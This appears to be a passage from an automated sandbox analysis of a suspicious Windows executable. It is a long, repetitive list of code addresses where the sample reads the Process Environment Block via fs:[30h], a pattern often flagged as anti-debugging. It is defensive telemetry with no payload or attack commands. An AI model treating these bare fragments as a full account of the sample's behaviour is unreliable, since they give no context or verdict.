                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171823B mov eax, dword ptr fs:[00000030h]2_2_0171823B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017302E1 mov eax, dword ptr fs:[00000030h]2_2_017302E1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017302E1 mov eax, dword ptr fs:[00000030h]2_2_017302E1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017302E1 mov eax, dword ptr fs:[00000030h]2_2_017302E1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]2_2_0172A2C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]2_2_0172A2C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]2_2_0172A2C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]2_2_0172A2C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]2_2_0172A2C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017302A0 mov eax, dword ptr fs:[00000030h]2_2_017302A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017302A0 mov eax, dword ptr fs:[00000030h]2_2_017302A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]2_2_017B62A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B62A0 mov ecx, dword ptr fs:[00000030h]2_2_017B62A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]2_2_017B62A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]2_2_017B62A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]2_2_017B62A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]2_2_017B62A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E284 mov eax, dword ptr fs:[00000030h]2_2_0175E284
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E284 mov eax, dword ptr fs:[00000030h]2_2_0175E284
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A0283 mov eax, dword ptr fs:[00000030h]2_2_017A0283
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A0283 mov eax, dword ptr fs:[00000030h]2_2_017A0283
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A0283 mov eax, dword ptr fs:[00000030h]2_2_017A0283
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175656A mov eax, dword ptr fs:[00000030h]2_2_0175656A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175656A mov eax, dword ptr fs:[00000030h]2_2_0175656A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175656A mov eax, dword ptr fs:[00000030h]2_2_0175656A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728550 mov eax, dword ptr fs:[00000030h]2_2_01728550
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728550 mov eax, dword ptr fs:[00000030h]2_2_01728550
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]2_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]2_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]2_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]2_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]2_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]2_2_01730535
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]2_2_0174E53E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]2_2_0174E53E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]2_2_0174E53E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]2_2_0174E53E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]2_2_0174E53E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6500 mov eax, dword ptr fs:[00000030h]2_2_017B6500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]2_2_017F4500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017225E0 mov eax, dword ptr fs:[00000030h]2_2_017225E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]2_2_0174E5E7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C5ED mov eax, dword ptr fs:[00000030h]2_2_0175C5ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C5ED mov eax, dword ptr fs:[00000030h]2_2_0175C5ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017265D0 mov eax, dword ptr fs:[00000030h]2_2_017265D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A5D0 mov eax, dword ptr fs:[00000030h]2_2_0175A5D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A5D0 mov eax, dword ptr fs:[00000030h]2_2_0175A5D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E5CF mov eax, dword ptr fs:[00000030h]2_2_0175E5CF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E5CF mov eax, dword ptr fs:[00000030h]2_2_0175E5CF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017445B1 mov eax, dword ptr fs:[00000030h]2_2_017445B1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017445B1 mov eax, dword ptr fs:[00000030h]2_2_017445B1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A05A7 mov eax, dword ptr fs:[00000030h]2_2_017A05A7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A05A7 mov eax, dword ptr fs:[00000030h]2_2_017A05A7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A05A7 mov eax, dword ptr fs:[00000030h]2_2_017A05A7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E59C mov eax, dword ptr fs:[00000030h]2_2_0175E59C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01722582 mov eax, dword ptr fs:[00000030h]2_2_01722582
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01722582 mov ecx, dword ptr fs:[00000030h]2_2_01722582
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01754588 mov eax, dword ptr fs:[00000030h]2_2_01754588
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174A470 mov eax, dword ptr fs:[00000030h]2_2_0174A470
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174A470 mov eax, dword ptr fs:[00000030h]2_2_0174A470
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174A470 mov eax, dword ptr fs:[00000030h]2_2_0174A470
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC460 mov ecx, dword ptr fs:[00000030h]2_2_017AC460
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DA456 mov eax, dword ptr fs:[00000030h]2_2_017DA456
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171645D mov eax, dword ptr fs:[00000030h]2_2_0171645D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174245A mov eax, dword ptr fs:[00000030h]2_2_0174245A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]2_2_0175E443
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E420 mov eax, dword ptr fs:[00000030h]2_2_0171E420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E420 mov eax, dword ptr fs:[00000030h]2_2_0171E420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E420 mov eax, dword ptr fs:[00000030h]2_2_0171E420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C427 mov eax, dword ptr fs:[00000030h]2_2_0171C427
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]2_2_017A6420
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01758402 mov eax, dword ptr fs:[00000030h]2_2_01758402
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01758402 mov eax, dword ptr fs:[00000030h]2_2_01758402
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01758402 mov eax, dword ptr fs:[00000030h]2_2_01758402
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017204E5 mov ecx, dword ptr fs:[00000030h]2_2_017204E5
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017544B0 mov ecx, dword ptr fs:[00000030h]2_2_017544B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AA4B0 mov eax, dword ptr fs:[00000030h]2_2_017AA4B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017264AB mov eax, dword ptr fs:[00000030h]2_2_017264AB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DA49A mov eax, dword ptr fs:[00000030h]2_2_017DA49A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01728770 mov eax, dword ptr fs:[00000030h]2_2_01728770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01730770 mov eax, dword ptr fs:[00000030h]2_2_01730770
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720750 mov eax, dword ptr fs:[00000030h]2_2_01720750
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762750 mov eax, dword ptr fs:[00000030h]2_2_01762750
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762750 mov eax, dword ptr fs:[00000030h]2_2_01762750
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE75D mov eax, dword ptr fs:[00000030h]2_2_017AE75D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A4755 mov eax, dword ptr fs:[00000030h]2_2_017A4755
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175674D mov esi, dword ptr fs:[00000030h]2_2_0175674D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175674D mov eax, dword ptr fs:[00000030h]2_2_0175674D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175674D mov eax, dword ptr fs:[00000030h]2_2_0175674D
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175273C mov eax, dword ptr fs:[00000030h]2_2_0175273C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175273C mov ecx, dword ptr fs:[00000030h]2_2_0175273C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175273C mov eax, dword ptr fs:[00000030h]2_2_0175273C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179C730 mov eax, dword ptr fs:[00000030h]2_2_0179C730
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C720 mov eax, dword ptr fs:[00000030h]2_2_0175C720
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C720 mov eax, dword ptr fs:[00000030h]2_2_0175C720
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01720710 mov eax, dword ptr fs:[00000030h]2_2_01720710
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01750710 mov eax, dword ptr fs:[00000030h]2_2_01750710
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C700 mov eax, dword ptr fs:[00000030h]2_2_0175C700
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017247FB mov eax, dword ptr fs:[00000030h]2_2_017247FB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017247FB mov eax, dword ptr fs:[00000030h]2_2_017247FB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017427ED mov eax, dword ptr fs:[00000030h]2_2_017427ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017427ED mov eax, dword ptr fs:[00000030h]2_2_017427ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017427ED mov eax, dword ptr fs:[00000030h]2_2_017427ED
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE7E1 mov eax, dword ptr fs:[00000030h]2_2_017AE7E1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172C7C0 mov eax, dword ptr fs:[00000030h]2_2_0172C7C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A07C3 mov eax, dword ptr fs:[00000030h]2_2_017A07C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017207AF mov eax, dword ptr fs:[00000030h]2_2_017207AF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D47A0 mov eax, dword ptr fs:[00000030h]2_2_017D47A0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C678E mov eax, dword ptr fs:[00000030h]2_2_017C678E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01752674 mov eax, dword ptr fs:[00000030h]2_2_01752674
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E866E mov eax, dword ptr fs:[00000030h]2_2_017E866E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E866E mov eax, dword ptr fs:[00000030h]2_2_017E866E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A660 mov eax, dword ptr fs:[00000030h]2_2_0175A660
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A660 mov eax, dword ptr fs:[00000030h]2_2_0175A660
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173C640 mov eax, dword ptr fs:[00000030h]2_2_0173C640
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E627 mov eax, dword ptr fs:[00000030h]2_2_0173E627
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01756620 mov eax, dword ptr fs:[00000030h]2_2_01756620
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01758620 mov eax, dword ptr fs:[00000030h]2_2_01758620
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172262C mov eax, dword ptr fs:[00000030h]2_2_0172262C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01762619 mov eax, dword ptr fs:[00000030h]2_2_01762619
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E609 mov eax, dword ptr fs:[00000030h]2_2_0179E609
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173260B mov eax, dword ptr fs:[00000030h]2_2_0173260B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]2_2_0179E6F2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]2_2_0179E6F2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]2_2_0179E6F2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E6F2 mov eax, dword ptr fs:[00000030h]2_2_0179E6F2
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A06F1 mov eax, dword ptr fs:[00000030h]2_2_017A06F1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A06F1 mov eax, dword ptr fs:[00000030h]2_2_017A06F1
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0175A6C7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A6C7 mov eax, dword ptr fs:[00000030h]2_2_0175A6C7
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017566B0 mov eax, dword ptr fs:[00000030h]2_2_017566B0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175C6A6 mov eax, dword ptr fs:[00000030h]2_2_0175C6A6
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724690 mov eax, dword ptr fs:[00000030h]2_2_01724690
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724690 mov eax, dword ptr fs:[00000030h]2_2_01724690
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C4978 mov eax, dword ptr fs:[00000030h]2_2_017C4978
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C4978 mov eax, dword ptr fs:[00000030h]2_2_017C4978
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC97C mov eax, dword ptr fs:[00000030h]2_2_017AC97C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01746962 mov eax, dword ptr fs:[00000030h]2_2_01746962
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01746962 mov eax, dword ptr fs:[00000030h]2_2_01746962
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01746962 mov eax, dword ptr fs:[00000030h]2_2_01746962
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176096E mov eax, dword ptr fs:[00000030h]2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176096E mov edx, dword ptr fs:[00000030h]2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176096E mov eax, dword ptr fs:[00000030h]2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A0946 mov eax, dword ptr fs:[00000030h]2_2_017A0946
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4940 mov eax, dword ptr fs:[00000030h]2_2_017F4940
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A892A mov eax, dword ptr fs:[00000030h]2_2_017A892A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B892B mov eax, dword ptr fs:[00000030h]2_2_017B892B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AC912 mov eax, dword ptr fs:[00000030h]2_2_017AC912
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718918 mov eax, dword ptr fs:[00000030h]2_2_01718918
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718918 mov eax, dword ptr fs:[00000030h]2_2_01718918
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E908 mov eax, dword ptr fs:[00000030h]2_2_0179E908
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E908 mov eax, dword ptr fs:[00000030h]2_2_0179E908
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017529F9 mov eax, dword ptr fs:[00000030h]2_2_017529F9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017529F9 mov eax, dword ptr fs:[00000030h]2_2_017529F9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017AE9E0 mov eax, dword ptr fs:[00000030h]2_2_017AE9E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]2_2_0172A9D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]2_2_0172A9D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]2_2_0172A9D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]2_2_0172A9D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]2_2_0172A9D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A9D0 mov eax, dword ptr fs:[00000030h]2_2_0172A9D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017549D0 mov eax, dword ptr fs:[00000030h]2_2_017549D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EA9D3 mov eax, dword ptr fs:[00000030h]2_2_017EA9D3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B69C0 mov eax, dword ptr fs:[00000030h]2_2_017B69C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A89B3 mov esi, dword ptr fs:[00000030h]2_2_017A89B3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A89B3 mov eax, dword ptr fs:[00000030h]2_2_017A89B3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A89B3 mov eax, dword ptr fs:[00000030h]2_2_017A89B3
